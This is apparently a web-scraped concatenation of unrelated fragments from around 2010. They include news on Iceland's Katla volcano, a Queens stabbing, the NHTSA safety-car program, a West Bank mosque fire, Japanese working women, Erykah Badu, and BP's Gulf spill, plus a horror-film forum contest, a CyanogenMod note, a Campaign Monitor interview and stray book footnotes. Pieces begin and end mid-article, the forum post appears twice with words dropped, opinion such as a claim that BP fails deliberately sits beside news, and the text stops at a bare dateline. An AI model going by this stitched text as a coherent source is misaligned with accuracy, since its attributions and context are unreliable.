This article was adapted from a passage in the book Why Government Does n't Work , the complete text of which is now available for downloading at www.LibertyFree.com.
------
1 The Denny ’s suit was announced in the San Francisco Examiner , May 24 , 1993 .
The settlement was reported in The New York Times , May 29 , 1994 , Section 4 , page 4 .
2 The woman with the microchip in her tooth , the employee who brought a gun to work , and the National Guard case were all described in Reason magazine , May 1995 , page 15 .
3San Francisco Examiner , October 22 , 1993 .
4 The case was brought against Fuqua Industries , Inc. in Florida , and was reported in The Wall Street Journal , December 23 , 1992 .
HarryBrowne.org
Home
Photo Gallery Journal Update About Harry
Rule Your World !
Audio Course eBooks Harry Browne Store Radio Archives Article Index
eBook Automatic Notification FreedomWire Subscription Acrobat Reader Free
By Victoria Gill
Science reporter , BBC News
As scientists and air travellers alike keep a close eye on Iceland 's ongoing volcanic eruption , some reports suggest that another , much bigger , volcano could stir in the near future .
Katla is Eyjafjallajokull 's more active neighbour , and scientists believe that there may be a link between the two volcanoes .
This link has not been physically proven , explains Magnus Tumi Gudmundsson a geophysicist from the University of Iceland .
A circumstantial , historical connection " is putting people 's eyes on Katla , " he says .
" We know of four Eyjafjallajokull eruptions in the past [ dating back to AD 500 ] and in three out of these four cases , there has been a Katla eruption either at the same time or shortly after .
" By shortly , I mean timescales of months to a year .
" We consider that the probability of Katla erupting in the near future has increased since Eyjafjallajokull went . "
Kathryn Goodenough from the British Geological Survey points out that , as yet , there is no physical explanation for this apparent link .
It seems that when Eyjafjallajokull goes off , Katla tends to follow .
Kathryn Goodenough
British Geological Survey " Scientists do n't yet know what the connection is , " she says .
" But we know there are fissures running between the two volcanoes .
And they 're quite close to each other .
" They 're also being subjected to the same tectonic forces .
So the chances are that if magma can find a pathway to rise beneath one of them , it can find its way to rise beneath the other . "
Researchers do know that the two volcanoes have separate magma chambers , but many suspect that these chambers are physically linked in some way , deep beneath the surface of the Earth .
" But this is only speculative , " says Dr Goodenough .
" We do n't have geophysical evidence that makes that clear . "
Overdue eruption Katla 's last eruption was in 1918 .
It lasted for three weeks and up to a cubic kilometre of material exploded through its vent .
" It 's a much more active volcano than Eyjafjallajokull - it has had about 20 eruptions in the last 1,000 years , so it erupts about once every 50 years on average , " says Professor Gudmundsson .
The combination of ice and magma makes for an explosive eruption " At first glance people would say it 's now long overdue .
But the larger the eruption , the longer the pause ( in ) time that follows it , and that 1918 eruption was large . "
At the moment , there is no seismic activity detectable underneath Katla that would indicate that magma is moving upward underneath it .
Scientists from the Icelandic Meteorological
Office are looking at such signals and updating their website regularly with the seismic data that is being produced .
But Dr Goodenough points out that , with Eyjafjallajokull " we only had a few hours warning " .
" Seismic monitoring does not necessarily give you advance notice of an eruption . "
But it remains a case of watch , wait and look for signs of activity , because it is almost impossible to draw clear conclusions from the historical record , which is simply too short .
While both volcanoes have been repeatedly erupting for hundreds of thousands of years , the earliest eruptions on scientists ' records occurred about 8,400 years ago .
Dr Dave McGarvie , a volcanologist from the UK's Open University , who has carried out extensive research in Iceland , explains that in that time Katla has erupted as many as 300 times .
" If we simply look at the historical record , then yes , there appears to be a link [ between the two volcanoes ] , " he says .
" But Katla does go off independently , so the link it could be pure co-incidence .
" We just do n't have a pattern to get a grip of . "
Professor Gudmundsson adds : " We have n't established any physical link [ between the volcanoes ] - we only have this circumstantial evidence , " says .
" And we simply do n't have enough data to be able to work out what the probability of a Katla eruption is . "
Flooding concern Katla is much larger than Eyjafjallajokull , with a magma chamber about 10 times the size .
If and when it does go off , the combination of the magma and the large ice sheet covering the volcano could lead to explosive activity for a long time , says Dr Goodenough .
It is the explosive nature of the current volcanic eruption , which caused an ash plume to be sent high into the atmosphere and affect flights in the UK and Europe .
More worryingly for the people of Iceland , an eruption at Katla would probably cause major flooding .
The volcano 's ice sheet is 600 - 700 m thick and all of this ice would quickly melt on to the surrounding area , which is primarily agricultural land .
But Professor Gudmundsson says there are " no signs yet " of an impending eruption .
" Our eyes are not glued to Katla , we are thinking about the eruption that is happening now . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Last Sunday , 32 year - old Hugo Alfredo Tale - Yax was stabbed while coming to the aid of a woman being attacked by a knife - wielding assailant .
He bled to death on a Queens sidewalk as almost 25 pedestrians walked by .
Click to view
Tale - Yax , a homeless Guatemalan immigrant , was stabbed at 5:40 a.m. in Queens after chasing off the attacker .
The video shows most pedestrians walking by after with little more than a sideways glance .
One man takes a cell phone picture ; another shakes him before walking way .
Finally , fire - fighters arrived at 7:23 a.m. , nearly an 1 1/2 hour after the attack .
According to the New York Post , the fire - fighters were " responding to a 911 call of a non-life - threatening injury " .
By that time , Tale - Yax was dead .
His killer is still at large .
With stories like this , the first impulse is to imagine you would have been the one to stop and help Tale - Yax .
That 's probably what these people thought , too .
Until they did n't .
A crowd estimated at 30,000 to 35,000 people gathered Saturday near New Jersey ’s Statehouse to protest Gov. Chris Christie ’s proposed budget cuts .
State police , who gave the crowd estimate , said no problems were reported .
The crowd is believed to be one of the largest ever to protest in state history .
It was mostly comprised of public employee union members and several community and nonprofit groups that would lose some or all their funding if Christie ’s plans are adopted .
ADVERTISEMENT
Christie has called for workers to accept wage freezes , and he ’s pushed for them to contribute toward their health benefits .
The governor was not in the Statehouse on Saturday and was not at the rally .
He has said that protesters have a right to speak their minds .
Independent telco analyst Paul Budde said this is the overriding good news of the plan .
“ Fifteen years and 6 to 7 per cent return on investment is perfectly aligned with other utilities .
It will mean it will cost $ 30 to $ 35 to the wholesalers and $ 50 or $ 60 to retail for broadband and voice .
That is a positive thing , ” Budde said .
The Minister for Broadband , Communications and the Digital Economy , Senator Stephen Conroy released the study at lunchtime today but did not reveal whether Telstra had come to the NBN party .
Telstra has so far resisted involvement in the NBN as it struggles to protect its profitable copper lines revenue , but it might not be able to compete with retail prices as low as $ 50 or $ 60 if the NBN is implemented as recommended in the study .
It also risks having home landlines cancelled if customers can access voice through a reliable and fast fibre broadband network .
One suggestion would be for Telstra to sell its infrastructure to NBN Co and become a wholesaler of telecommunications services , competing with other ISPs on the same footing .
Thirty - five years ago , the U.S. government built a fleet of cars that were safer than anything on the road .
Twenty - five years ago , the government shredded them in secret .
Two escaped the crusher .
This is their story .
Advertisement
As Congress and the auto industry wrestle with another round of tougher safety standards , nothing on the menu comes close to setting up the federal government 's own vehicle design business .
Yet that 's exactly what Congress did in 1966 .
With the furor from Ralph Nader 's Unsafe at Any Speed still fresh , the original act creating the Department of Transportation also ordered it to build its own experimental vehicles for testing new safety devices , and swap notes with 13 other countries .
The young faces at the new agency farmed out the first set to three companies , including General Motors .
Advertisement
The result :
Three swamp - monster sedans of more than 5000 pounds apiece that did double - duty as safe transportation and appetite suppressants .
The October 1972 issue of Popular Mechanics laid out the details : Roof - mounted periscopes ; bumpers wide enough to haul Dom Deluise ; and in the GM model , a rear - seat " credenza , " so back - seat passengers would be protected in crashes by smacking into a vinyl - covered bosom .
Unsatisfied with the vault - on - wheels solution , the National Highway Traffic Safety Administration changed course .
It held a bake - off in 1975 for what a safe car in 1985 might look like .
Ford and Volkswagen offered ideas , but NHTSA awarded what would become a $ 30 million contract to two independent engineering firms , Calspan and Minicars .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
While Calspan modified French - built Simcas donated by Chrysler , Minicars designed a new model from scratch , aiming to build a four - passenger small car that could protect all its occupants in a 50 - mph crash from either the front or side while burning as little fuel as possible .
The result looked like an AMC Pacer worked over by the set designers of Battlestar Galactica .
Advertisement
For a piece of American - built iron from the depths of the Carter administration , the 14 Minicar Research Safety Vehicles had a massive amount of technology .
The fender and front fascia were plastic composites that could take a 10 - mph smack unscathed .
Under the plastic body of the most advanced version were run-flat tires , anti-lock brakes with crash - sensing radar and dual - stage airbags .
The front seats were attached to the roof with a see - through plastic shield , so they would n't collapse in a rear - end collision .
Power came via four - cylinder engines pilfered from 1977 Honda Accords , mounted in a mid-rear layout driving the back wheels through a 5 - speed automated manual transmission .
Test drives scored about 32 miles to the gallon , but test crashes suggested passengers might walk away from most crashes up to 50 mph with minimal injuries .
NHTSA officials claimed thousands of lives a year could be saved if Minicar tech became standard .
Advertisement
And of course it had gullwing doors .
Don Friedman , who managed the project for Minicars , said the idea was simply to look as stylish as the concept being cast around the same time by John DeLorean .
By 1979 , NHTSA decided to convince U.S. automakers that safety could be sold as effectively as CB radios and Corinthian leathers , putting the Minicar RSV up at auto shows and county fairs to make the point .
Ben Kelley , then working as the research director for the Insurance Institute for Highway Safety , decided to make a public service announcement for the effort , and convinced Lorne Greene to donate a day in his best white suit :
" The safest automobile ever created , " Commander Adama intoned .
" There 's one slight catch : You ca n't buy it . "
Viewers were told to call NHTSA to voice their approval .
Advertisement
About 10,000 did .
The Minicar was far from showroom ready .
Gullwing doors of the 1970s were as reliable as Billy Carter the week before St. Patrick 's Day .
And for all its safety kit , the Minicar lacked one standard : front seat belts .
Advertisement
Airbags were n't new technology , but Detroit automakers were resisting using them in all but the largest or most luxurious models .
NHTSA and the RSV teams wanted to show how well their advanced bags could work in small cars , especially if the riders were n't belted .
Friedman noted that only 13 % of Americans were using seat belts in 1980 , and that was n't expected to change much before 1985 .
Advertisement
Armed with data from 59 RSVs from Minicars and Calspan / Chrysler , NHTSA chief Joan Claybrook was ready to press on in 1980 with a new generation of safety vehicles , setting a target of a 2000 - lb. car that could seat four and pass a battery of 40 - mph crash tests .
All that ended in January 1981 , when the " Morning in America " team from the Reagan administration halted the RSV work and promptly fracked the Lorne Greene promos .
Two years later , Kelley would tell Congress that by safety standards all new U.S. vehicles were " obsolete the moment they roll off the assembly line . "
Thanks to Americans ' general dislike of buckling up , the government 's experts were forecasting 70,000 auto deaths a year by 1990 .
Advertisement
The few remaining safety cars moldered away in the Department of Transportation 's basement until 1990 , when safety advocates such as Clarence Ditlow and the then - Republican controlled agency began a long - running feud over whether tougher fuel economy rules would lead to more deaths from smaller vehicles .
After exploring whether the Smithsonian wanted any of the RSV cars ( they did ) , NHTSA revealed under a Freedom of Information
Act query that it had quietly sent all remaining cars to be destroyed .
On July 1 , 1991 , the RSV showcar was crashed into a barrier at 50 mph with no dummies inside , and its airbags shut off .
Advertisement
Then - NHTSA chief Jerry Curry contended the vehicles were obsolete , and that anyone who could have learned something from them had done so by then .
Claybrook , the NHTSA chief who'd overseen the RSV cars through 1980 , told Congress the destruction compared to the Nazis burning books .
Advertisement
" Junking those cars was a terrible idea , " said Kelley , who now teaches at Tufts medical school .
" What is the benefit of keeping anything that 's historically important ?
The future wants to know more about the past , and when you destroy the past , you destroy the future 's access to knowing about it . "
" I thought they were intentionally destroying the evidence that you could do much better , " said Friedman .
Advertisement
What the government did n't know was that it had lost count .
When the Reagan crew shuttered the RSV program in 1981 , Minicars still had two cars in its shop ; one mostly built , the other without an engine .
Over the years , the cars were stored and ignored until a California man named Frank Richardson bought them in 1996 from an asset sale he used to set up his own crash - test business .
Advertisement
Last year , Richardson and Friedman revealed to NHTSA that the Minicars still existed , and the agency paid for a refurbish .
The one intact Minicar needs a water pump , but otherwise runs .
" If somebody wanted to buy them , the price would be very high , " Richardson said .
Like other American inventions such as the VCR , the lithium - ion battery and David Hasselhoff , many of the RSV 's technologies only prospered overseas .
Anti-lock brakes and air bags were standard on European cars first ; Japanese automakers put the first crash - sensing brake system on the market in 2003 , nearly 25 years after the RSV sported it .
Yet those five - star ratings from NHTSA that have become standard for front crash safety in U.S. cars come from tests at 35 mph , still 15 mph shy of the RSV bar .
Advertisement
Last year , traffic deaths fell to their lowest level since 1961 at 33,963 , after remaining stuck at roughly 40,000 for decades , in part because a modern car has more in common with the RSVs than ever before .
With smaller cars , tougher fuel rules and bigger worries about oil on the horizon , that 1985 target date for the program may have been set about 30 years too early .
" I do n't think that RSV had much influence in its time , " says Friedman .
" It is a precursor of the performance we 're going to see in the future . "
Advertisement
Justin Hyde is a reporter in Washington .
Photo Credits : Center for Auto Safety archives , Karco Engineering
Click to view
Weekly Comp - Harpoon : The Reykjavik Whale Watching Massacre - 16/05/2010
This week 's prize for Cult Lab's Weekly Competition is none other than the much talked about ,
 THE TEXAS CHAINSAW MASSACRE ON A WHALER  A BRILLIANT CONCEPT EXECUTED IN A MOST IMAGINATIVE , OLD SCHOOL WAY .
HORROR FANS ARE GOING TO LAP IT UP , BIG TIME . ( FOUR STARS )  Billy Chainsaw , Bizarre Magazine
The Icelandic film industrys first ever bona fide foray into in - your - face exploitation horror movie territory , Harpoon : The Reykjavik Whale Watching Massacre is a blackly comic and supremely gory affair that has led David Hayles of The Times to claim , its tourists versus deranged whalers in this fright flick thatll make you scream and blubber . 
Having recently been given a rapturously reception by a rabid audience of appreciative horror fans attending a sold out screening at the Glasgow Film Festivals Annual Frightfest , Harpoon : The Reykjavik Whale Watching Massacre comes to DVD in May 2010 courtesy of E1 Entertainment and promises to be one of the most talked about horror releases of the year .
Directed by Julius Kemp ( Wallpaper : An Erotic Love Story ) and written by award winning novelist and lyricist Sjon Sigurdsson ( Dancer In The Dark ) , the film stars old  Leatherface  himself , Gunnar Hansen ( The Texas Chainsaw Massacre ) , as the ill - fated captain in charge of a tourist whale watching trip that takes a horrifying turn .
When a freak accident leaves the captain of their boat mortally wounded and the first mate jumps ship following his attempted rape of a passenger , a small group of tourists are forced to seek refuge on a passing former whaling vessel manned by a family of  Fishbillies  with a psychotic score to settle .
With whaling no longer on the agenda , the tourists become the helpless prey aboard a ship that is soon to be sailing on a sea of blood .
An unapologetic homage to the Tobe Hooper classic from which it has pilfered its title , Harpoon : The Reykjavik Whale Watching Massacre is a gutsy and graphic slasher that adds a dark vein of humour to its increasingly inventive methods of dispatching the unfortunate victims for whom a day trip at sea turns into the worst possible nightmare .
Harpoon : The Reykjavik Whale Watching Massacre ( cert. 18 ) will be released on DVD ( £ 12.99 ) by E1 Entertainment on 10th May 2010 .
But how do you win this ?
SIMPLE !
Harpoon .
Fishing .
Fish .
Food .
BINGO !
Below is a series of 4 horror film themed menu's .
All you have to do is guess what film they 're from .
Easy peasy .
Once you know , just PM me your answers .
Need help ?
Help is always on hand - I 'll PM you back a hint if you get stuck .
Then , next sunday , before the new comp , I 'll randomly pick three winners from a hat .
You must get all four correct to be put into the hat however .
GOOD LUCK EVERYONE !
Here 's the menus :
Kyle HELLO !
This week 's prize for Cult Lab's Weekly Competition is none other than the much talked about , The Icelandic film industrys first ever bona fide foray into in - your - face exploitation horror movie territory , is a blackly comic and supremely gory affair that has led David Hayles of The Times to claim , its tourists versus deranged whalers in this fright flick thatll make you scream and blubber .
Having recently been given a rapturously reception by a rabid audience of appreciative horror fans attending a sold out screening at the Glasgow Film Festivals Annual Frightfest , comes to DVD in May 2010 courtesy of E1 Entertainment and promises to be one of the most talked about horror releases of the year .
Directed by Julius Kemp ( ) and written by award winning novelist and lyricist Sjon Sigurdsson ( ) , the film stars old  Leatherface  himself , Gunnar Hansen ( ) , as the ill - fated captain in charge of a tourist whale watching trip that takes a horrifying turn .
When a freak accident leaves the captain of their boat mortally wounded and the first mate jumps ship following his attempted rape of a passenger , a small group of tourists are forced to seek refuge on a passing former whaling vessel manned by a family of  Fishbillies  with a psychotic score to settle .
With whaling no longer on the agenda , the tourists become the helpless prey aboard a ship that is soon to be sailing on a sea of blood .
An unapologetic homage to the Tobe Hooper classic from which it has pilfered its title , is a gutsy and graphic slasher that adds a dark vein of humour to its increasingly inventive methods of dispatching the unfortunate victims for whom a day trip at sea turns into the worst possible nightmare .( cert. 18 ) will be released on DVD ( £ 12.99 ) by E1 Entertainment on 10th May 2010 .
But how do you win this ?
SIMPLE !Harpoon .
Fishing .
Fish .
Food .
BINGO !Below is a series of 4 horror film themed menu's .
All you have to do is guess what film they 're from .
Easy peasy .
Once you know , just PM me your answers .
Need help ?
Help is always on hand - I 'll PM you back a hint if you get stuck .
Then , next sunday , before the new comp , I 'll randomly pick three winners from a hat .
You must get all four correct to be put into the hat however .
GOOD LUCK EVERYONE !
Here 's the menus : Kyle
The best cult movies free on Amazon Prime ( updated regularly ) __________________
Holy books were also destroyed in the mosque fire
A mosque near the Palestinian West Bank city of Nablus has been damaged by fire , officials say .
Palestinian president Mahmoud Abbas says the fire was caused by Jewish settlers , and that it could jeopardise Israeli - Palestinian peace talks .
Israeli media reports reports said an electrical short circuit may have started the blaze .
But Israeli security officers investigating the fire have not yet determined its cause , police say .
The mosque was gutted by the fire , which also destroyed holy books .
Lubban al - Sharqiya , the village where the mosque lies , is close to three Jewish settlements , AFP reports .
The attack comes as US Middle East envoy George Mitchell has returned to the region , attempting to restart Israeli - Palestinian peace talks .
" This criminal attack threatens efforts to revive the peace process , " said Mr Abbas in a statement .
He pointed the finger of blame at Israel , adding that " the Israeli army protects the settlers " .
' Pointless negotiations '
Israeli Trade Minister Binyamin Ben-Eliezer said the fire was probably caused by arson .
" I have no shadow of doubt their aim was to ignite fire in the region and this is lamentable , " he was quoted as saying by Israel 's army radio .
Hamas , which is opposed to peace talks with Israel , said the mosque attack is " the first fruit of the pointless negotiations , " Reuters reports .
Israel warned Palestinians in the West Bank that there was a risk of local settlers attacking homes in the area after the Israeli army demolished houses in a settlement near Nablus , Palestinian officials say .
" We had an official warning yesterday that settlers may try to attack Palestinian homes because of the demolition of houses built without a permit " , Nablus governor Jibril al - Bakri was quoted as saying by AFP .
The West Bank has seen a series of attacks on mosques in recent months .
Last month , another mosque in the village of Huwara near Nablus was vandalised by Hebrew graffiti .
Palestinian residents blamed activists from three nearby Jewish settlements .
In January , Israeli police arrested settlers as part of investigations into an arson attack on a West Bank mosque in 2009 .
Chie , a former saleswoman at a Japanese firm , remembers paying her dues at the office .
She put up with men who slapped women ’s backsides .
She donned a uniform and showed up the required 15 minutes early to brew coffee .
Finally , after five years , she told her boss she wanted to take over from two departing salesmen .
“ At the next meeting , he said he was hiring two guys for the jobs , ” recalls Chie , who did not want to use her full name .
“ I quit .
And then my boss asked me , ‘ Oh , were you serious ? ’
“ I was the first and last person to take maternity leave at that company , ” she adds .
Japanese companies have long had a reputation of being unfriendly to women , especially mothers .
That image was reinforced recently by the World Economic Forum , which downgraded Japan in its Gender Gap Report from 98th of 130 countries in 2008 to 101st out of 134 countries in 2009 .
But on April 19 , government and industry representatives set a target of getting 55 percent of women to return to work after having children .
Also in April , Japan celebrated Exhibit A for that goal : “ mama astronaut ” Naoko Yamazaki , who was part of a recent space shuttle crew .
And Japan ’s low birthrate , and the falling ratio of workers to the aging , are prompting more companies to try to appeal to women .
IN PICTURES : Top 10 developed countries where women make less than men
IN PICTURES : Top 10 developed countries where women 's pay comes closest to men's pay
“ Since the population started falling , and then the financial crisis , companies are more conscious of hanging onto their best workers , including the most talented women , ” says Miko Fukushima , a mother of two who returned to work at a multinational finance - related firm .
“ At some of the biggest Japanese companies , benefits for women , such as maternity leave and creche facilities , are better than at many foreign firms , ” she says .
“ Most of the smaller firms , even some bigger ones , have a long way to go , though . ”
Government figures show the situation has actually deteriorated since the first legislation on workplace discrimination in 1985 .
Some firms categorized employees as “ career ” or “ administration , ” with women invariably herded into the latter category .
These “ office ladies ” typically did routine clerical work and served tea .
Between 1985 and 2008 , the proportion of female full - time employees fell from 68.1 percent to 46.5 percent .
Put another way , 53.5 percent of women in the workforce are part - time or contract workers , while the figure for men is 19.1 percent .
In 2007 , a strengthened law passed that outlawed such indirect discrimination .
But successful legal challenges to the status quo remain few .
As a result , ambitious young Japanese women often head to foreign firms .
“ I worked as a temp at Dell in Japan and was really surprised :
There were women managers and women in other senior positions , ” Chie says .
With her heart set on working for a firm that would take her seriously , she went to the United States to get a law degree , and was later hired to work in the legal department at Dell in Japan .
Still , the recent response to Ms. Yamazaki , the astronaut , may inspire some young girls .
Yamazaki , who has a young child , joined another Japanese national on the International Space Station in April .
The media ran numerous stories of how her husband , who also worked in the space program , put his career on hold for her , and the stress it had put on their family .
“ I think she ’s very impressive and makes me think Japanese women can do anything , ” says Yuki Saito , a student at a women ’s university in Tokyo .
“ Women of my mother ’s generation had fewer chances for a career , let alone a career and a family , ” she adds .
“ While the situation for us is still very different [ from those of ] women in foreign countries , it is getting better . ”
IN PICTURES : Top 10 developed countries where women make less than men
IN PICTURES : Top 10 developed countries where women 's pay comes closest to men's pay
Related :
( CNN ) -- Erykah Badu 's naked stroll through downtown Dallas , Texas , for a music video has earned her a disorderly conduct citation .
The singer shed her clothes as she walked through Dealey Plaza until she was nude and then fell near where President John F. Kennedy was assassinated .
Badu said the video was " shot guerrilla style , " without a crew and in one take March 17 .
A Dallas Police spokeswoman said earlier in the week that they wanted to press charges against Badu because children were present , but no one had called police or filed a complaint that day .
Police now have their witness .
" One witness did come forward yesterday , thus leading to the charges filed today , " a statement from Dallas Police said Friday .
A citation of misdemeanor disorderly conduct has been mailed to Badu , who is a Dallas resident , police said .
" After much discussion , it has been determined that this charge best fits her conduct when she disrobed in a public place without disregard [ sic ] to other individuals and children who were in close proximity , " the police statement said .
If convicted , Badu could be fined $ 500 , police said .
" It will be up to her as to how she wants to proceed further with this case , " police said .
" She can contest it in a court of law or simply pay the fine . "
Badu and her representatives did not immediately respond to a request for comment .
She did post a series of short messages on the social networking site Twitter last weekend , soon after the " Window Seat " video was released on her Web site .
She tweeted that " there were children there .
i prayed they wouldnt b traumatized . "
That 's why they initially sent their minions to the Louisiana Coast to bilk poor Cajun watermen out of their ability to sue .
That 's when they thought the damage could be contained from a financial perspective .
That was Plan " A . "
" Plan " A " is long since moot .
I would argue that at this point in the disaster the die is cast , and it makes little if no difference to BP 's ability to operate as a going concern whether the gushing volcano is stopped now or months from now .
The sheer magnitude of the lawsuits is going to be staggering -- think of the hundreds of billions of dollars in permanently despoiled property alone .
All of these claims will ultimately find their way to BP 's door , or the door of their excess insurance carriers .
Which is why it makes sense , from the standpoint of defending itself , for BP not to stop the gushing , and in fact to take half - measures which by their very nature will not succeed , yet prolong the appearance of BP " making an effort . "
The nature of this type of liability litigation practically demands that BP do this to survive .
If BP were able to stop the flow of oil through either its " top hat , " " junk shot , " or any of the other creative methods being bandied about , the line of attack at trial would be " Why were n't you able to do this sooner ? "
That 's an argument that BP , with all of its hired experts , can never win .
The sole question the plaintiff 's lawyers will rely on ( in addition to their case on causation of the explosion itself ) will be " Was the technology available to stop this a month earlier ? "
The answer is obvious -- yes , it was .
Of course it was .
" Then , BP , why did n't you employ that method sooner ? "
When automotive manufacturers introduced airbags , they were sued for failing to put airbags in earlier model cars .
When construction equipment manufacturers introduced roll bars on their tractors , they were sued for failing to install them on earlier models .
When doctors ' patients get sick and die , the doctors are sued for failing to make an earlier diagnosis .
That is the way product liability and negligence cases work .
If BP stops the bleeding now , a key tenet of their litigation defense is lost .
Far better for BP to defend on the grounds that " nothing we tried worked , " than to have something actually work , and then be called on the timing .
That 's why they 're drilling that relief well .
As we 've been admonished ad nauseum by the media , the relief well is the only sure way to stop the flow of oil .
In the end , BP will complete the relief well , and point to that as its defense : " See , nothing ( else ) could be done !
How can you hold us liable ? "
And ( and as an aside ) you can bet that Chevron , Mobil , and Exxon are all watching how BP handles this very closely , because they know this could happen to them .
This type of cataclysmic event presents a common threat to all oil companies -- it 's their worst fear .
For this strategy to work , however , the corporation must make a show of taking a series of plausible " measures " in order to bolster its defense that " we tried everything , nothing worked . "
But , understand , these measures must fail .
That 's why the " siphon tube " method was so useful to them -- they can argue that their efforts brought fruit in reducing ( not eliminating ) the oil flow .
See , we 're good guys !
And no , we can't quantify for you how much oil we saved there , but dammit , we saved some , give us credit !
BP already has armies of lawyers and experts prepared to point the finger as to the actual cause of the explosion , who bears responsibility , and most importantly , who should pay .
They are prepared to fight that battle , which will degenerate into a " he said , she said " contest .
But BP 's goal now is to contain their exposure .
The only way to do that is to keep failing until that relief well is drilled .
President Obama never practiced law per se .
He was a law professor .
Had he practiced law he would probably have better insight into why BP 's interests could never be analogous to the interests of the country .
Once that well started gushing interminable amounts , the sole interest of BP was and remained BP .
And he might have known that for BP to survive ( at this point ) , the Gulf must die .
Droid , Milestone , Eris , Moment , Spica , even the Hero , all have had their Eclair , one way or another .
G1 and myTouch 3G ?
Not so much .
But do n't worry , Android early adopters , because Cyanogen 's got your back .
Most all the bells , whistles and hardware - accelerated graphics of Android 2.1 are coming to the HTC Dream , Magic and Sapphire in Cyanogen Mod 5.0.7 , and you can see a video of a T - Mobile G1 running the new build after the break .
Twitter buzz indicates the ROM will be out any minute now is nearly ready ; the dev himself tweeted that it 's good to go and just needs G1 - friendly bite size packaging .
Update :
Do n't stay up all night waiting -- Cyanogen says he 's got " two more bugs to kill " and is " hoping for a test1 public beta tomorrow night . "
[ Thanks , Philosophics ]
“ Profitable and proud ” is a new series here at Signal vs. Noise .
We ’ll highlight tech companies ( and others ) that have $ 1 M + in revenues , did n’t take VC , and are profitable .
First up : Campaign Monitor , a small software company in Sydney that makes elegant email marketing software for designers and their clients .
Co-founder David Greiner tells us about CM ’s path below .
How successful is your business ?
Any numbers you ’re willing to share to back that up ?
Success is a tricky thing to define because it means different things to different people .
From a financial perspective we ’ve been very successful .
We ’re a private company so do n’t share any numbers .
I can tell you we ’ve managed to more than double our revenues and profits every year for the last six years .
All without taking any outside investment .
While the financial success has been great , there are other aspects of the business that I would consider more of a success personally .
I genuinely still love what I do .
I work with interesting , funny people .
My wife and I are expecting our first child soon and I can work the hours I want .
For me these things are much better indicators of a successful business than anything on a spreadsheet .
You started as a small web design shop and then clients started approaching you to send email newsletters for them .
How did you make the switch to selling a product ?
How much time did it take to build something on the side ?
The idea for selling our own software really came out of frustration more than anything else .
We were designing email newsletters for a lot of our clients but could n’t find the right tool for the job .
After trying everything on the market , we built a simple app that let our clients manage their own newsletters .
All our clients loved it and it created a nice new revenue stream for us .
We quickly realized this was something other web designers would love too .
In early 2004 we cut back our schedule a little and built Campaign Monitor on the side .
The majority of our days were still spent on regular web design work , but every spare moment was spent building the first version of Campaign Monitor .
It took us just over six months from having the idea to launch .
Dave ( left ) and co-founder Ben Richardson .
Did you ever consider taking on any investors ?
Why or why not ?
Outside investment was never an option that interested us .
I think there are a couple of reasons for this .
First , we were building something for ourselves , so we already had a good idea what the problem was and how to solve it .
Our background was designing and developing for the web , so we did n’t need to hire anyone .
Plus , we could fund the whole process with the profits of our consulting business .
We ’re not talking big numbers here either .
It ’s amazing what a small team can achieve when you really focus for a couple of hours each day .
On top of this , the first version of Campaign Monitor was deliberately simple .
We hosted it on a relatively cheap shared server with the rest of our clients .
We spent next to nothing on marketing , and just relentlessly improved the product week after week .
How long did it take you to get the product to a point where it was profitable ?
How long until you stopped doing client work completely ?
After launch we continued to spend an hour or two a day improving the product and talking to customers .
By our sixth month Campaign Monitor revenues were already on par with our consulting business .
We ’re quite conservative , and waited another six months before focusing on the product full - time .
By this time Campaign Monitor was generating more than three times more revenue than the web design business , so we were comfortable making the transition .
We did n’t want to leave our existing consulting clients in the lurch , so we created a new company to focus on Campaign Monitor and hired on a new team member to take over the web design business , which is still operating today .
Screenshot of Campaign Monitor .
A first analysis of oil from the Gulf of Mexico spill suggests that it might not be typical Louisiana sweet crude , as was originally thought , but a heavier form of petroleum that could have a much harsher environmental impact and make cleanup much more difficult , one Louisiana oil spill expert warned Friday .
Most experts have assumed that the oil slick consists of Louisiana sweet crude because that is the predominant product in the region .
The new analysis will make them take a closer look .
The analysis is based on only a single sample , “ but it has caused my level of apprehension to go way up , ” said environmental scientist Edward B. Overton of Louisiana State University , who is analyzing the oil for the National Oceanic and Atmospheric Administration .
So far , he appears to be the only researcher who thinks there may be a bigger - than - expected problem with the oil .
“ This could be a fluke sample , ” he conceded , and researchers are “ desperately ” trying to get more samples — a project that is not as simple as it might sound .
“ We ’re hoping and praying that it is Louisiana sweet crude , but if it is not … this is going to be a very unique spill .
We have never seen a spill with this high an asphaltenic content . ”
Advertisement
Asphaltenes are the heaviest components of some crudes .
They do n’t burn , they are not attacked by bacteria in the environment , and they do n’t evaporate .
Their resistance to such degradation is what makes them useful in constructing roads that can survive weathering for long periods .
But it also makes cleanup exceptionally difficult .
Asphaltenes are “ a fairly sticky and gooey material that can be bad news for larger animals , ” said earth scientist David Valentine of UC Santa Barbara .
“ Asphaltene oils seem to aggregate and do n’t form slicks like light crude , ” he said .
The oil seepage off the coast of California is a good example of high - asphaltene - content oils , and its behavior — condensing into little balls when it rises to the surface of the ocean — is typical of such materials .
The gulf slick , “ from what I have seen , seems consistent with it being a light crude oil , ” he added .
But he has not analyzed samples , and apparently no one besides Overton has either .
Or at least , Overton said , no one seems to have examined the oil ’s asphaltene content .
Light crude such as the Louisiana sweet crude is prized by refiners because it produces a greater proportion of gasoline and similar chemicals .
Most of the oil in international commerce is light crude , and most previous large spills , such as the 1989 wreck of the Exxon Valdez off the coast of Alaska , have involved relatively light oils , Overton said .
Advertisement
Asphaltenes are less toxic than light crude , but they are much less biodegradable and much harder to wash off animals , birds and shorelines .
They are resistant to the dispersants used to break oil into tiny particles that are more readily degraded in the environment .
They are emulsified by seawater to form a viscous , gelatinous substance that is difficult to handle .
In other words , cleanup can be a nightmare .
The federal government has been funding some research projects over the last five years to examine what happens to such oils in the environment , Valentine said , “ but it is not well established what is going to happen to the stuff . ”
The sample analyzed by Overton was collected by a skimmer that was sent out to collect oil from the ocean surface .
“ My only caveat is I do n’t know the history of the skimmer .
Was it empty when it went out , ” or might it have already had some high - asphaltene material on board ?
“ It ’s not supposed to , but things like this happen in a spill , ” Overton said .
“ Everyone ’s response is , ‘ Let ’s get some more samples , ’ ” he said , “ but the logistics are difficult .
The spill is 50 miles out , which does n’t sound like much , but in a motorcraft , that ’s six to seven hours out and the same to get back .
There ’s no way to land a plane out there .
It is way too rough . ”
Advertisement
Overton hoped to have more samples analyzed by Sunday .
Until then , all he could suggest was , “ Stay tuned . ”
thomas.maugh@latimes.com
CHICAGO ( Reuters ) -
